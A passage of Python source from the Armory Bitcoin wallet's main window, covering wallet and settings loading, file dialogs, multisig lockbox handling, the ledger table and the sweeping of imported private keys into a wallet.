uriDict = self.parseUriLink(uriStr, self.tr('clicked'))
if len(uriDict)>0:
self.bringArmoryToFront()
return self.uriSendBitcoins(uriDict)
#############################################################################
def loadWalletsAndSettings(self, updateProgress):
LOGINFO('loadWalletsAndSettings')
self.getSettingOrSetDefault('First_Load', True)
self.getSettingOrSetDefault('Load_Count', 0)
self.getSettingOrSetDefault('User_Mode', 'Advanced')
self.getSettingOrSetDefault('UnlockTimeout', 10)
self.getSettingOrSetDefault('DNAA_UnlockTimeout', False)
# Determine if we need to do new-user operations, increment load-count
self.firstLoad = False
if self.getSettingOrSetDefault('First_Load', True):
self.firstLoad = True
self.writeSetting('First_Load', False)
self.writeSetting('First_Load_Date', long(RightNow()))
self.writeSetting('Load_Count', 1)
self.writeSetting('AdvFeature_UseCt', 0)
else:
self.writeSetting('Load_Count', (self.settings.get('Load_Count')+1) % 100)
# Set the usermode, default to standard
self.usermode = USERMODE.Standard
if self.settings.get('User_Mode') == 'Advanced':
self.usermode = USERMODE.Advanced
elif self.settings.get('User_Mode') == 'Expert':
self.usermode = USERMODE.Expert
# Set the language, default to English
self.language = 'en'
if self.settings.get('Language') != '':
self.language = self.settings.get('Language')
# The user may have asked to never be notified of a particular
# notification again. We have a short-term list (wiped on every
# load), and a long-term list (saved in settings). We simply
# initialize the short-term list with the long-term list, and add
# short-term ignore requests to it
notifyStr = self.getSettingOrSetDefault('NotifyIgnore', '')
nsz = len(notifyStr)
self.notifyIgnoreLong = set(notifyStr[8*i:8*(i+1)] for i in range(nsz/8))
self.notifyIgnoreShort = set(notifyStr[8*i:8*(i+1)] for i in range(nsz/8))
# Load wallets found in the .armory directory
self.walletMap = {}
self.walletIndices = {}
self.walletIDSet = set()
self.walletManager = None
# I need some linear lists for accessing by index
self.walletIDList = []
self.walletVisibleList = []
self.wltIDList = []
self.combinedLedger = []
self.ledgerSize = 0
self.ledgerTable = []
self.walletSideScanProgress = {}
LOGINFO('Loading wallets...')
wltPaths = readWalletFiles()
wltExclude = self.settings.get('Excluded_Wallets', expectList=True)
ratioPerWallet = 0
if len(wltPaths) > 0:
ratioPerWallet = 100 / float(len(wltPaths))
i = 0
for fpath in wltPaths:
currentProgress = float(i) * ratioPerWallet
updateProgress(currentProgress)
i += 1
def reportProgress(val):
updateProgress(currentProgress + val*ratioPerWallet
)
try:
wltLoad = PyBtcWallet().readWalletFile(fpath, \
reportProgress=reportProgress)
wltID = wltLoad.uniqueIDB58
if fpath in wltExclude or wltID in wltExclude:
continue
wltLoaded = True
if wltID in self.walletIDSet:
LOGWARN('***WARNING: Duplicate wallet detected, %s', wltID)
wo1 = self.walletMap[wltID].watchingOnly
wo2 = wltLoad.watchingOnly
if wo1 and not wo2:
prevWltPath = self.walletMap[wltID].walletPath
self.walletMap[wltID] = wltLoad
LOGWARN('First wallet is more useful than the second one...')
LOGWARN(' Wallet 1 (loaded): %s', fpath)
LOGWARN(' Wallet 2 (skipped): %s', prevWltPath)
else:
wltLoaded = False
LOGWARN('Second wallet is more useful than the first one...')
LOGWARN(' Wallet 1 (skipped): %s', fpath)
LOGWARN(' Wallet 2 (loaded): %s', self.walletMap[wltID].walletPath)
else:
# Update the maps/dictionaries
self.walletMap[wltID] = wltLoad
self.walletIndices[wltID] = len(self.walletMap)-1
# Maintain some linear lists of wallet info
self.walletIDSet.add(wltID)
self.walletIDList.append(wltID)
wtype = determineWalletType(wltLoad, self)[0]
notWatch = (not wtype == WLTTYPES.WatchOnly)
defaultVisible = self.getWltSetting(wltID, 'LedgerShow', notWatch)
self.walletVisibleList.append(defaultVisible)
wltLoad.mainWnd = self
if wltLoaded is False:
continue
except:
LOGEXCEPT( '***WARNING: Wallet could not be loaded: %s (skipping)',
fpath)
#raise
LOGINFO('Number of wallets read in: %d', len(self.walletMap))
for wltID, wlt in self.walletMap.iteritems():
dispStr = (' Wallet (%s):' % wlt.uniqueIDB58).ljust(25)
dispStr += '"'+wlt.labelName.ljust(32)+'" '
dispStr += '(Encrypted)' if wlt.useEncryption else '(No Encryption)'
LOGINFO(dispStr)
# Create one wallet per lockbox to make sure we can query individual
# lockbox histories easily.
if self.usermode==USERMODE.Expert:
LOGINFO('Loading Multisig Lockboxes')
self.loadLockboxesFromFile(MULTISIG_FILE)
# Get the last directory
savedDir = self.settings.get('LastDirectory')
if len(savedDir)==0 or not os.path.exists(savedDir):
savedDir = ARMORY_HOME_DIR
self.lastDirectory = savedDir
self.writeSetting('LastDirectory', savedDir)
updateProgress(100)
self.loadCppWallets()
#############################################################################
def loadCppWallets(self):
#load all existing cpp wallets
if self.walletManager == None:
self.walletManager = Cpp.WalletManager(str(ARMORY_HOME_DIR))
#check python wallets against cpp wallets
from ui.WalletMirrorDialog import WalletComparisonClass
wltCmpObj = WalletComparisonClass(self)
wltCmpObj.checkWallets()
#load all cpp wallets
for wltID in self.walletMap:
wlt = self.walletMap[wltID]
wlt.cppWallet = self.walletManager.getCppWallet(wltID)
#############################################################################
@RemoveRepeatingExtensions
def getFileSave(self, title='Save Wallet File', \
ffilter=['Wallet files (*.wallet)'], \
defaultFilename=None):
LOGDEBUG('getFileSave')
startPath = self.settings.get('LastDirectory')
if len(startPath)==0 or not os.path.exists(startPath):
startPath = ARMORY_HOME_DIR
if not defaultFilename==None:
startPath = os.path.join(startPath, defaultFilename)
types = ffilter
types.append('All files (*)')
typesStr = ';; '.join(str(_type) for _type in types)
# Open the native file save dialog and grab the saved file/path unless
# we're in OS X, where native dialogs sometimes freeze. Looks like a Qt
# issue of some sort. Some experimental code under ArmoryMac that directly
# calls a dialog produces better results but still freezes under some
# circumstances.
if not OS_MACOSX:
fullPath = unicode(QFileDialog.getSaveFileName(self, title, startPath,
typesStr))
else:
fullPath = unicode(QFileDialog.getSaveFileName(self, title, startPath,
typesStr,
options=QFileDialog.DontUseNativeDialog))
fdir,fname = os.path.split(fullPath)
if fdir:
self.writeSetting('LastDirectory', fdir)
return fullPath
#############################################################################
def getFileLoad(self, title='Load Wallet File', \
ffilter=['Wallet files (*.wallet)'], \
defaultDir=None):
LOGDEBUG('getFileLoad')
if defaultDir is None:
defaultDir = self.settings.get('LastDirectory')
if len(defaultDir)==0 or not os.path.exists(defaultDir):
defaultDir = ARMORY_HOME_DIR
types = list(ffilter)
types.append(self.tr('All files (*)'))
typeStr = QString("")
for i in range(0, len(types)):
_type = types[i]
typeStr += QString(_type)
if i < len(types) - 1:
typeStr += QString(";; ")
# Open the native file load dialog and grab the loaded file/path unless
# we're in OS X, where native dialogs sometimes freeze. Looks like a Qt
# issue of some sort. Some experimental code under ArmoryMac that directly
# calls a dialog produces better results but still freezes under some
# circumstances.
if not OS_MACOSX:
fullPath = unicode(QFileDialog.getOpenFileName(self, title, defaultDir,
typeStr))
else:
fullPath = unicode(QFileDialog.getOpenFileName(self, title, defaultDir,
typeStr,
options=QFileDialog.DontUseNativeDialog))
self.writeSetting('LastDirectory', os.path.split(fullPath)[0])
return fullPath
##############################################################################
def getWltSetting(self, wltID, propName, defaultValue=''):
# Sometimes we need to settings specific to individual wallets -- we will
# prefix the settings name with the wltID.
wltPropName = 'Wallet_%s_%s' % (wltID, propName)
if self.settings.hasSetting(wltPropName):
return self.settings.get(wltPropName)
else:
if not defaultValue=='':
self.setWltSetting(wltID, propName, defaultValue)
return defaultValue
#############################################################################
def setWltSetting(self, wltID, propName, value):
wltPropName = 'Wallet_%s_%s' % (wltID, propName)
self.writeSetting(wltPropName, value)
#############################################################################
def toggleIsMine(self, wltID):
alreadyMine = self.getWltSetting(wltID, 'IsMine')
if alreadyMine:
self.setWltSetting(wltID, 'IsMine', False)
else:
self.setWltSetting(wltID, 'IsMine', True)
#############################################################################
def loadLockboxesFromFile(self, fn):
self.allLockboxes = []
self.cppLockboxWltMap = {}
if not os.path.exists(fn):
return
lbList = readLockboxesFile(fn)
for lb in lbList:
self.updateOrAddLockbox(lb)
#############################################################################
def updateOrAddLockbox(self, lbObj, isFresh=False):
try:
lbID = lbObj.uniqueIDB58
index = self.lockboxIDMap.get(lbID)
if index is None:
# Add new lockbox to list
self.allLockboxes.append(lbObj)
self.lockboxIDMap[lbID] = len(self.allLockboxes)-1
else:
# Replace the original
self.allLockboxes[index] = lbObj
writeLockboxesFile(self.allLockboxes, MULTISIG_FILE)
except:
LOGEXCEPT('Failed to add/update lockbox')
#############################################################################
def removeLockbox(self, lbObj):
lbID = lbObj.uniqueIDB58
index = self.lockboxIDMap.get(lbID)
if index is None:
LOGERROR('Tried to remove lockbox that DNE: %s', lbID)
else:
del self.allLockboxes[index]
self.reconstructLockboxMaps()
writeLockboxesFile(self.allLockboxes, MULTISIG_FILE)
#############################################################################
def reconstructLockboxMaps(self):
self.lockboxIDMap.clear()
for i,box in enumerate(self.allLockboxes):
self.lockboxIDMap[box.uniqueIDB58] = i
#############################################################################
def getLockboxByID(self, boxID):
index = self.lockboxIDMap.get(boxID)
return None if index is None else self.allLockboxes[index]
################################################################################
# Get the lock box ID if the p2shAddrString is found in one of the lockboxes
# otherwise it returns None
def getLockboxByP2SHAddrStr(self, p2shAddrStr):
for lboxId in self.lockboxIDMap.keys():
lbox = self.allLockboxes[self.lockboxIDMap[lboxId]]
if lbox.hasScrAddr(p2shAddrStr):
return lbox
return None
#############################################################################
def browseLockboxes(self):
self.lbDialog = DlgLockboxManager(self, self)
self.lbDialog.exec_()
self.lblDialog = None
#############################################################################
def getContribStr(self, binScript, contribID='', contribLabel=''):
"""
This is used to display info for the lockbox interface. It might also be
useful as a general script_to_user_string method, where you have a
binScript and you want to tell the user something about it. However,
it is verbose, so it won't fit in a send-confirm dialog, necessarily.
We should extract as much information as possible without contrib*. This
at least guarantees that we see the correct data for our own wallets
and lockboxes, even if the data for other parties is incorrect.
"""
displayInfo = self.getDisplayStringForScript(binScript, 60, 2)
if displayInfo['WltID'] is not None:
return displayInfo['String'], ('WLT:%s' % displayInfo['WltID'])
elif displayInfo['LboxID'] is not None:
return displayInfo['String'], ('LB:%s' % displayInfo['LboxID'])
scriptType = getTxOutScriptType(binScript)
# At this point, we can use the contrib ID (and know we can't sign it)
if contribID or contribLabel:
if contribID:
if contribLabel:
outStr = self.tr('Contributor "%1" (%2)').arg(contribLabel, contribID)
else:
outStr = self.tr('Contributor %1').arg(contribID)
else:
if contribLabel:
outStr = self.tr('Contributor "%1"').arg(contribLabel)
else:
outStr = self.tr('Unknown Contributor')
LOGERROR('How did we get to this impossible else-statement?')
return outStr, ('CID:%s' % contribID)
# If no contrib ID, then salvage anything
astr = displayInfo['AddrStr']
cid = None
if scriptType == CPP_TXOUT_MULTISIG:
M,N,a160s,pubs = getMultisigScriptInfo(binScript)
dispStr = 'Unrecognized Multisig %d-of-%d: P2SH=%s' % (M,N,astr)
cid = 'MS:%s' % astr
elif scriptType == CPP_TXOUT_P2SH:
dispStr = 'Unrecognized P2SH: %s' % astr
cid = 'P2SH:%s' % astr
elif scriptType in CPP_TXOUT_HAS_ADDRSTR:
dispStr = 'Address: %s' % astr
cid = 'ADDR:%s' % astr
else:
dispStr = 'Non-standard: P2SH=%s' % astr
cid = 'NS:%s' % astr
return dispStr, cid
#############################################################################
def getWalletForAddr160(self, addr160):
for wltID, wlt in self.walletMap.iteritems():
if wlt.hasScrAddr(addr160):
return wltID
return ''
#############################################################################
def getWalletForScrAddr(self, scrAddr):
for wltID, wlt in self.walletMap.iteritems():
if wlt.hasScrAddr(scrAddr):
return wltID
return ''
#############################################################################
def getSettingOrSetDefault(self, settingName, defaultVal):
s = self.settings.getSettingOrSetDefault(settingName, defaultVal)
return s
#############################################################################
def writeSetting(self, settingName, val):
self.settings.set(settingName, val)
# NB: armoryd has a similar function (Armory_Daemon::start()), and both share
# common functionality in ArmoryUtils (finishLoadBlockchainCommon). If you
# mod this function, please be mindful of what goes where, and make sure
# any critical functionality makes it into armoryd.
def finishLoadBlockchainGUI(self):
# Let's populate the wallet info after finishing loading the blockchain.
self.setDashboardDetails()
self.memPoolInit = True
self.createCombinedLedger()
self.ledgerSize = len(self.combinedLedger)
self.statusBar().showMessage(self.tr('Blockchain loaded, wallets sync\'d!'), 10000)
currSyncSuccess = self.getSettingOrSetDefault("SyncSuccessCount", 0)
self.writeSetting('SyncSuccessCount', min(currSyncSuccess+1, 10))
if self.getSettingOrSetDefault('NotifyBlkFinish',True):
reply,remember = MsgBoxWithDNAA(self, self, MSGBOX.Info,
self.tr('Blockchain Loaded!'), self.tr('Blockchain loading is complete. '
'Your balances and transaction history are now available '
'under the "Transactions" tab. You can also send and '
'receive bitcoins.'), dnaaMsg=self.tr('Do not show me this notification again '), yesStr='OK')
if remember==True:
self.writeSetting('NotifyBlkFinish',False)
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Ledger)
self.netMode = NETWORKMODE.Full
self.settings.set('FailedLoadCount', 0)
# This will force the table to refresh with new data
self.removeBootstrapDat() # if we got here, we're *really* done with it
self.walletModel.reset()
qLen = self.delayedURIData['qLen']
if qLen > 0:
#delayed URI parses, feed them back to the uri parser now
for i in range(0, qLen):
uriStr = self.delayedURIData[qLen-i-1]
self.delayedURIData['qLen'] = qLen -i -1
self.uriLinkClicked(uriStr)
#############################################################################
def removeBootstrapDat(self):
bfile = os.path.join(BTC_HOME_DIR, 'bootstrap.dat.old')
if os.path.exists(bfile):
os.remove(bfile)
#############################################################################
def changeLedgerSorting(self, col, order):
"""
The direct sorting was implemented to avoid having to search for comment
information for every ledger entry. Therefore, you can't sort by comments
without getting them first, which is the original problem to avoid.
"""
if col in (LEDGERCOLS.NumConf, LEDGERCOLS.DateStr, \
LEDGERCOLS.Comment, LEDGERCOLS.Amount, LEDGERCOLS.WltName):
self.sortLedgCol = col
self.sortLedgOrder = order
self.createCombinedLedger()
#############################################################################
def createCombinedLedger(self, resetMainLedger=False):
"""
Create a ledger to display on the main screen, that consists of ledger
entries of any SUBSET of available wallets.
"""
bdmState = TheBDM.getState()
self.combinedLedger = []
totalFunds = 0
spendFunds = 0
unconfFunds = 0
if bdmState == BDM_BLOCKCHAIN_READY:
for wltID in self.wltIDList:
wlt = self.walletMap[wltID]
totalFunds += wlt.getBalance('Total')
spendFunds += wlt.getBalance('Spendable')
unconfFunds += wlt.getBalance('Unconfirmed')
self.ledgerSize = len(self.combinedLedger)
# Many MainWindow objects haven't been created yet...
# let's try to update them and fail silently if they don't exist
try:
if bdmState in (BDM_OFFLINE, BDM_SCANNING):
self.lblTotalFunds.setText( '-'*12 )
self.lblSpendFunds.setText( '-'*12 )
self.lblUnconfFunds.setText('-'*12 )
return
uncolor = htmlColor('MoneyNeg') if unconfFunds>0 else htmlColor('Foreground')
btccolor = htmlColor('DisableFG') if spendFunds==totalFunds else htmlColor('MoneyPos')
lblcolor = htmlColor('DisableFG') if spendFunds==totalFunds else htmlColor('Foreground')
goodColor= htmlColor('TextGreen')
self.lblTotalFunds.setText('<b><font color="%s">%s</font></b>' % (btccolor,coin2str(totalFunds)))
self.lblTot.setText(self.tr('<b><font color="%1">Maximum Funds:</font></b>').arg(lblcolor))
self.lblBTC1.setText('<b><font color="%s">BTC</font></b>' % lblcolor)
self.lblSpendFunds.setText('<b><font color=%s>%s</font></b>' % (goodColor, coin2str(spendFunds)))
self.lblUnconfFunds.setText(('<b><font color="%s">%s</font></b>' % \
(uncolor, coin2str(unconfFunds))))
if resetMainLedger == False:
self.ledgerModel.reset()
else:
self.ledgerView.goToTop()
except AttributeError:
raise
if not self.usermode==USERMODE.Expert:
return
# In expert mode, we're updating the lockbox info, too
try:
self.lockboxLedgModel.reset()
except:
LOGEXCEPT('Failed to update lockbox ledger')
#############################################################################
def getCommentForLockboxTx(self, lboxId, le):
commentSet = set([])
lbox = self.allLockboxes[self.lockboxIDMap[lboxId]]
for a160 in lbox.a160List:
wltID = self.getWalletForAddr160(a160)
if wltID:
commentSet.add(self.walletMap[wltID].getCommentForLE(le))
return ' '.join(commentSet)
#############################################################################
def convertLedgerToTable(self, ledger, showSentToSelfAmt=True, wltIDIn=None):
table2D = []
datefmt = self.getPreferredDateFormat()
for le in ledger:
if wltIDIn is None:
wltID = le.getWalletID()
else:
wltID = wltIDIn
row = []
wlt = self.walletMap.get(wltID)
if wlt:
isWatch = (determineWalletType(wlt, self)[0] == WLTTYPES.WatchOnly)
wltName = wlt.labelName
dispComment = self.getCommentForLE(le, wltID)
else:
lboxId = wltID
lbox = self.getLockboxByID(lboxId)
if not lbox:
continue
isWatch = True
wltName = '%s-of-%s: %s (%s)' % (lbox.M, lbox.N, lbox.shortName, lboxId)
dispComment = self.getCommentForLockboxTx(lboxId, le)
nConf = TheBDM.getTopBlockHeight() - le.getBlockNum()+1
if le.getBlockNum()>=0xffffffff:
nConf=0
# If this was sent-to-self... we should display the actual specified
# value when the transaction was executed. This is pretty difficult
# when both "recipient" and "change" are indistinguishable... but
# They're actually not because we ALWAYS generate a new address to
# for change , which means the change address MUST have a higher
# chain index
amt = le.getValue()
#if le.isSentToSelf() and wlt and showSentToSelfAmt:
#amt = determineSentToSelfAmt(le, wlt)[0]
# NumConf
row.append(nConf)
# UnixTime (needed for sorting)
row.append(le.getTxTime())
# Date
row.append(unixTimeToFormatStr(le.getTxTime(), datefmt))
# TxDir (actually just the amt... use the sign of the amt to determine dir)
row.append(coin2str(le.getValue(), maxZeros=2))
# Wlt Name
row.append(wltName)
# Comment
if le.isOptInRBF() == True:
if le.getValue() < 0 or le.isSentToSelf():
dispComment = self.tr("*Right click to bump fee* ") + dispComment
else:
dispComment = self.tr("*** RBF Flagged *** ") + dispComment
elif le.isChainedZC() == True:
dispComment = self.tr("*** Chained ZC *** ") + dispComment
row.append(dispComment)
# Amount
row.append(coin2str(amt, maxZeros=2))
# Is this money mine?
row.append(isWatch)
# ID to display (this might be the lockbox ID)
row.append( wltID )
# TxHash
row.append( binary_to_hex(le.getTxHash() ))
# Is this a coinbase/generation transaction
row.append( le.isCoinbase() )
# Sent-to-self
row.append( le.isSentToSelf() )
# RBF and zc chain status
row.append( le.isOptInRBF() )
row.append(le.isChainedZC())
# Finally, attach the row to the table
table2D.append(row)
return table2D
#############################################################################
def walletListChanged(self):
self.walletModel.reset()
self.populateLedgerComboBox()
self.changeWltFilter()
#############################################################################
def populateLedgerComboBox(self):
try:
comboIdx = self.comboWltSelect.currentIndex()
if comboIdx < 0:
raise
except:
comboIdx = self.getSettingOrSetDefault('LastFilterState', 0)
self.comboWltSelect.clear()
self.comboWltSelect.addItem( self.tr('My Wallets' ))
self.comboWltSelect.addItem( self.tr('Offline Wallets' ))
self.comboWltSelect.addItem( self.tr('Other\'s wallets' ))
self.comboWltSelect.addItem( self.tr('All Wallets' ))
self.comboWltSelect.addItem( self.tr('Custom Filter' ))
for wltID in self.walletIDList:
self.comboWltSelect.addItem( self.walletMap[wltID].labelName )
self.comboWltSelect.insertSeparator(5)
self.comboWltSelect.insertSeparator(5)
self.comboWltSelect.setCurrentIndex(comboIdx)
#############################################################################
def execDlgWalletDetails(self, index=None):
if len(self.walletMap)==0:
reply = QMessageBox.information(self, self.tr('No Wallets!'),
self.tr('You currently do not have any wallets. Would you like to '
'create one, now?'), QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return
if index==None:
index = self.walletsView.selectedIndexes()
if len(self.walletMap)==1:
self.walletsView.selectRow(0)
index = self.walletsView.selectedIndexes()
elif len(index)==0:
QMessageBox.warning(self, self.tr('Select a Wallet'), \
self.tr('Please select a wallet on the right, to see its properties.'), QMessageBox.Ok)
return
index = index[0]
wlt = self.walletMap[self.walletIDList[index.row()]]
dialog = DlgWalletDetails(wlt, self.usermode, self, self)
self.walletDialogDict[wlt.uniqueIDB58] = dialog
dialog.exec_()
if wlt.uniqueIDB58 in self.walletDialogDict:
del self.walletDialogDict[wlt.uniqueIDB58]
#############################################################################
def execClickRow(self, index=None):
row,col = index.row(), index.column()
if not col==WLTVIEWCOLS.Visible:
return
wltID = self.walletIDList[row]
currEye = self.walletVisibleList[row]
self.walletVisibleList[row] = not currEye
self.setWltSetting(wltID, 'LedgerShow', not currEye)
if TheBDM.getState()==BDM_BLOCKCHAIN_READY:
self.changeWltFilter()
#############################################################################
def updateTxCommentFromView(self, view):
index = view.selectedIndexes()[0]
row, col = index.row(), index.column()
currComment = str(view.model().index(row, LEDGERCOLS.Comment).data().toString())
wltID = str(view.model().index(row, LEDGERCOLS.WltID ).data().toString())
txHash = str(view.model().index(row, LEDGERCOLS.TxHash ).data().toString())
if not currComment:
dialog = DlgSetComment(self, self, currComment, self.tr('Add Transaction Comment'))
else:
dialog = DlgSetComment(self, self, currComment, self.tr('Change Transaction Comment'))
if dialog.exec_():
newComment = str(dialog.edtComment.text())
view.model().updateIndexComment(index, newComment)
self.walletMap[wltID].setComment(hex_to_binary(txHash), newComment)
self.walletListChanged()
#############################################################################
def updateAddressCommentFromView(self, view, wlt):
index = view.selectedIndexes()[0]
row, col = index.row(), index.column()
currComment = str(view.model().index(row, ADDRESSCOLS.Comment).data().toString())
addrStr = str(view.model().index(row, ADDRESSCOLS.Address).data().toString())
if not currComment:
dialog = DlgSetComment(self, self, currComment, self.tr('Add Address Comment'))
else:
dialog = DlgSetComment(self, self, currComment, self.tr('Change Address Comment'))
if dialog.exec_():
newComment = str(dialog.edtComment.text())
atype, addr160 = addrStr_to_hash160(addrStr)
if atype==P2SHBYTE:
LOGWARN('Setting comment for P2SH address: %s' % addrStr)
wlt.setComment(addr160, newComment)
#############################################################################
def getAddrCommentIfAvailAll(self, txHash):
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
return ''
else:
appendedComments = []
for wltID,wlt in self.walletMap.iteritems():
cmt = wlt.getAddrCommentIfAvail(txHash)
if len(cmt)>0:
appendedComments.append(cmt)
return '; '.join(appendedComments)
#############################################################################
def getCommentForLE(self, le, wltID=None):
# Smart comments for LedgerEntry objects: get any direct comments ...
# if none, then grab the one for any associated addresses.
if wltID is None:
wltID = le.getWalletID()
return self.walletMap[wltID].getCommentForLE(le)
#############################################################################
def addWalletToApplication(self, newWallet, walletIsNew=False):
LOGINFO('addWalletToApplication')
# Update the maps/dictionaries
newWltID = newWallet.uniqueIDB58
if self.walletMap.has_key(newWltID):
return
self.walletMap[newWltID] = newWallet
self.walletIndices[newWltID] = len(self.walletMap)-1
# Maintain some linear lists of wallet info
self.walletIDSet.add(newWltID)
self.walletIDList.append(newWltID)
self.loadCppWallets()
newWallet.registerWallet(walletIsNew)
showByDefault = (determineWalletType(newWallet, self)[0] != WLTTYPES.WatchOnly)
self.walletVisibleList.append(showByDefault)
self.setWltSetting(newWltID, 'LedgerShow', showByDefault)
self.walletListChanged()
self.mainWnd = self
#############################################################################
def removeWalletFromApplication(self, wltID):
LOGINFO('removeWalletFromApplication')
idx = -1
try:
idx = self.walletIndices[wltID]
except KeyError:
LOGERROR('Invalid wallet ID passed to "removeWalletFromApplication"')
raise WalletExistsError
#self.walletMap[wltID].unregisterWallet()
del self.walletMap[wltID]
del self.walletIndices[wltID]
self.walletIDSet.remove(wltID)
del self.walletIDList[idx]
del self.walletVisibleList[idx]
# Reconstruct walletIndices
for i,wltID in enumerate(self.walletIDList):
self.walletIndices[wltID] = i
self.walletListChanged()
#############################################################################
def RecoverWallet(self):
DlgWltRecoverWallet(self, self).promptWalletRecovery()
#############################################################################
def createSweepAddrTx(self, sweepFromAddrObjList, sweepToScript):
"""
This method takes a list of addresses (likely just created from private
key data), finds all their unspent TxOuts, and creates a signed tx that
transfers 100% of the funds to the sweepTO160 address. It doesn't
actually execute the transaction, but it will return a broadcast-ready
PyTx object that the user can confirm. TxFee is automatically calc'd
and deducted from the output value, if necessary.
"""
LOGINFO('createSweepAddrTx')
if not isinstance(sweepFromAddrObjList, (list, tuple)):
sweepFromAddrObjList = [sweepFromAddrObjList]
addr160List = [a.getAddr160() for a in sweepFromAddrObjList]
utxoList = getUnspentTxOutsForAddr160List(addr160List)
if len(utxoList)==0:
return [None, 0, 0]
outValue = sumTxOutList(utxoList)
inputSide = []
for utxo in utxoList:
# The PyCreateAndSignTx method require PyTx and PyBtcAddress objects
rawTx = TheBDM.bdv().getTxByHash(utxo.getTxHash()).serialize()
a160 = CheckHash160(utxo.getRecipientScrAddr())
for aobj in sweepFromAddrObjList:
if a160 == aobj.getAddr160():
pubKey = aobj.binPublicKey65.toBinStr()
pubKeyMap = {}
pubKeyMap[ADDRBYTE + a160] = pubKey
txoIdx = utxo.getTxOutIndex()
inputSide.append(UnsignedTxInput(rawTx, txoIdx, None, pubKeyMap))
break
minFee = calcMinSuggestedFees(utxoList, outValue, 0, 1)
if minFee > 0:
LOGDEBUG( 'Subtracting fee from Sweep-output')
outValue -= minFee
if outValue<=0:
return [None, outValue, minFee]
# Creating the output list is pretty easy...
outputSide = []
outputSide.append(DecoratedTxOut(sweepToScript, outValue))
try:
# Make copies, destroy them in the finally clause
privKeyMap = {}
for addrObj in sweepFromAddrObjList:
scrAddr = ADDRBYTE + addrObj.getAddr160()
privKeyMap[scrAddr] = addrObj.binPrivKey32_Plain.copy()
pytx = PyCreateAndSignTx(inputSide, outputSide, privKeyMap)
return (pytx, outValue, minFee)
finally:
for scraddr in privKeyMap:
privKeyMap[scraddr].destroy()
#############################################################################
def confirmSweepScan(self, pybtcaddrList, targAddr160):
LOGINFO('confirmSweepScan')
gt1 = len(self.sweepAfterScanList)>1
if len(self.sweepAfterScanList) > 0:
QMessageBox.critical(self, self.tr('Already Sweeping'),
self.tr('You are already in the process of scanning the blockchain for '
'the purposes of sweeping other addresses. You cannot initiate '
'sweeping new addresses until the current operation completes. '
'<br><br>'
'In the future, you may select "Multiple Keys" when entering '
'addresses to sweep. There is no limit on the number that can be '
'specified, but they must all be entered at once.'), QMessageBox.Ok)
# Destroy the private key data
for addr in pybtcaddrList:
addr.binPrivKey32_Plain.destroy()
return False
confirmed=False
if TheBDM.getState() in (BDM_OFFLINE, BDM_UNINITIALIZED):
#LOGERROR('Somehow ended up at confirm-sweep while in offline mode')
#QMessageBox.info(self, 'Armory is Offline', \
#'Armory is currently in offline mode. You must be in online '
#'mode to initiate the sweep operation.')
nkey = len(self.sweepAfterScanList)
strPlur = self.tr('addresses') if nkey>1 else self.tr('address')
QMessageBox.info(self, self.tr('Armory is Offline'), \
self.tr('You have chosen to sweep %n key(s), but Armory is currently '
'in offline mode. The sweep will be performed the next time you '
'go into online mode. You can initiate online mode (if available) '
'from the dashboard in the main window.', "", nkey), QMessageBox.Ok)
confirmed=True
else:
msgConfirm = ( \
self.tr('Armory must scan the global transaction history in order to '
'find any bitcoins associated with the keys you supplied. '
'Armory will go into offline mode temporarily while the scan '
'is performed, and you will not have access to balances or be '
'able to create transactions. The scan may take several minutes.'
'<br><br>', "", len(self.sweepAfterScanList)))
if TheBDM.getState()==BDM_SCANNING:
msgConfirm += ( \
self.tr('There is currently another scan operation being performed. '
'Would you like to start the sweep operation after it completes? '))
elif TheBDM.getState()==BDM_BLOCKCHAIN_READY:
msgConfirm += ( \
self.tr('<b>Would you like to start the scan operation right now?</b>'))
msgConfirm += (self.tr('<br><br>Clicking "No" will abort the sweep operation'))
confirmed = QMessageBox.question(self, self.tr('Confirm Rescan'), msgConfirm, \
QMessageBox.Yes | QMessageBox.No)
if confirmed==QMessageBox.Yes:
for addr in pybtcaddrList:
TheBDM.registerImportedScrAddr(Hash160ToScrAddr(addr.getAddr160()))
self.sweepAfterScanList = pybtcaddrList
self.sweepAfterScanTarg = targAddr160
self.setDashboardDetails()
return True
#############################################################################
def finishSweepScan(self, wlt, sweepList, sweepAfterScanTarget):
LOGINFO('finishSweepScan')
self.sweepAfterScanList = []
#######################################################################
# The createSweepTx method will return instantly because the blockchain
# has already been rescanned, as described above
targScript = scrAddr_to_script(ADDRBYTE + sweepAfterScanTarget)
finishedTx, outVal, fee = self.createSweepAddrTx(sweepList, targScript)
gt1 = len(sweepList)>1
if finishedTx==None:
if (outVal,fee)==(0,0):
QMessageBox.critical(self, self.tr('Nothing to do'), \
self.tr('The private key(s) you have provided does not appear to contain '
'any funds. There is nothing to sweep.', "", len(sweepList)), \
QMessageBox.Ok)
return
else:
pladdr = (self.tr('addresses') if gt1 else self.tr('address'))
QMessageBox.critical(self, self.tr('Cannot sweep'),\
self.tr('You cannot sweep the funds from the address(es) you specified because '
'the transaction fee would be greater than or equal to the amount '
'swept. '
'<br><br> '
'<b>Balance of address(es):</b> %1<br> '
'<b>Fee to sweep address(es):</b> %2 '
'<br><br>The sweep operation has been canceled.', "", len(sweepList)).arg(coin2str(outVal+fee,maxZeros=0), coin2str(fee,maxZeros=0)), \
QMessageBox.Ok)
LOGERROR('Sweep amount (%s) is less than fee needed for sweeping (%s)', \
coin2str(outVal+fee, maxZeros=0), coin2str(fee, maxZeros=0))
return
# Finally, if we got here, we're ready to broadcast!
if gt1:
dispIn = self.tr('multiple addresses')
else:
addrStr = hash160_to_addrStr(sweepList[0].getAddr160())
dispIn = self.tr('address <b>%1</b>').arg(addrStr)
dispOut = self.tr('wallet <b>"%1"</b> (%2) ').arg(wlt.labelName, wlt.uniqueIDB58)
if DlgVerifySweep(dispIn, dispOut, outVal, fee).exec_():
self.broadcastTransaction(finishedTx, dryRun=False)
#############################################################################
def notifyNewZeroConf(self, leVec):
'''
Function that looks at an incoming zero-confirmation transaction queue and
determines if any incoming transactions were created by Armory. If so, the
transaction will be passed along to a user notification queue.
'''
vlen = leVec.size()
for i in range(0, vlen):
notifyIn = self.getSettingOrSetDefault('NotifyBtcIn', \
not OS_MACOSX)
notifyOut = self.getSettingOrSetDefault('NotifyBtcOut', \
not OS_MACOSX)
le = leVec[i]
if (le.getValue() <= 0 and notifyOut) or \
(le.getValue() > 0 and notifyIn):
self.notifyQueue.append([le.getWalletID(), le, False])
